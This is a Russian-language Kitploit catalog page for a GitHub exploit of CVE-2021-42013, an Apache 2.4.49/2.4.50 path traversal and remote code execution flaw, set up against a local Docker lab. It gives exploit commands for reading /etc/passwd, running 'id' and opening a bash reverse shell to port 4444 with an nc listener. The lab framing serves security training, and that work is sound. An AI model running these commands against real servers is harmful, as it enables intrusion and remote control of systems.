Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-42013 — Эксплойт для Apache 2.4.49/2.4.50 — обход пути и RCE (CVE-2021-42013). Включает настройку Docker и скрипт для проверки обхода пути, выполнения команд и получения обратной оболочки. | Kitploit
Инструменты/GitHubGitHub/asepsaepdin/cve-2021-42013
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеИнструмент Удаленного ДоступаЛаборатории и Практика
GitHubasepsaepdin/cve-2021-42013

CVE-2021-42013

Эксплойт для Apache 2.4.49/2.4.50 — обход пути и RCE (CVE-2021-42013). Включает настройку Docker и скрипт для проверки обхода пути, выполнения команд и получения обратной оболочки.

Репозиторий
111 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-42013 - Apache 2.4.50 Обход пути и удаленное выполнение кода (RCE)


⚠️ Только для образовательных и санкционированных исследований безопасности

Авторы оригинального эксплойта

Огромная благодарность оригинальному автору PoC Walnut Security Services Pvt. Ltd

Описание

Злоумышленник может использовать атаку обхода пути для сопоставления URL-адресов с файлами за пределами каталогов, настроенных с помощью директив типа Alias. Если файлы за пределами этих каталогов не защищены обычной конфигурацией по умолчанию "require all denied", такие запросы могут быть выполнены. Если также включены CGI-скрипты для этих псевдонимов путей, это может привести к удаленному выполнению кода. Эта проблема затрагивает только Apache 2.4.49 и Apache 2.4.50, но не более ранние версии.


Пошаговые инструкции

  1. Сначала клонируйте репозиторий

    root@kitploit:~
    git clone https://github.com/asepsaepdin/CVE-2021-42013.git
    
  • Перейдите в каталог

    root@kitploit:~
    cd CVE-2021-42013
    
  • Соберите уязвимый контейнер

    root@kitploit:~
    docker build -t CVE-2021-42013 .
    
  • Запустите эфемерный контейнер

    root@kitploit:~
    docker run --rm -it --name CVE-2021-42013 CVE-2021-42013
    
  • Проверьте IP-адрес контейнера

    root@kitploit:~
    docker inspect CVE-2021-42013 | grep "IPAddress"
    
  • Дайте разрешение на выполнение скрипту

    root@kitploit:~
    chmod +x cve-2021-42013.sh
    
  • Чтобы проверить и подтвердить обход пути, необходимо найти действительный каталог, который в данном случае настроен как /icons. Таким образом, выполнение следующей команды вызовет уязвимость обхода пути и выведет содержимое /etc/passwd:

    root@kitploit:~
    ./cve-2021-42013.sh 172.17.0.3/icons /etc/passwd
    
  • Чтобы проверить и подтвердить удаленное выполнение кода, CGI должен быть настроен и включен, что в данном случае так. Таким образом, выполнение следующей команды вызовет удаленное выполнение кода и выведет результат команды id:

    root@kitploit:~
    ./cve-2021-42013.sh 172.17.0.3 /bin/bash id
    
  • С точки зрения атакующего, удаленное выполнение кода имеет решающее значение для получения доступа к интерактивной оболочке. Таким образом, выполнение следующей команды вызовет обычный обратный shell поверх tcp на основе bash на систему атакующего на порту 4444/tcp:

    root@kitploit:~
    ./cve-2021-42013.sh 172.17.0.4 /bin/bash 'bash -i >& /dev/tcp/172.17.0.1/4444 0>&1'
    
    root@kitploit:~
    nc -nlvp 4444
    

  • Благодарности

    • https://github.com/walnutsecurity/cve-2021-42013
    • https://nvd.nist.gov/vuln/detail/CVE-2021-42013
    • https://www.exploit-db.com/docs/50552
    • https://www.exploit-db.com/exploits/50406
    Скачать инструмент